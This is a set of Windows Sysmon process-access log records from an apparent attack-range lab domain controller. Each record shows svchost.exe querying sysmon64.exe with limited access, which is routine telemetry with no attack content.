{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3744,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3745,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3746,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3747,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3748,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3749,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3750,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3751,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:48.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:48.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
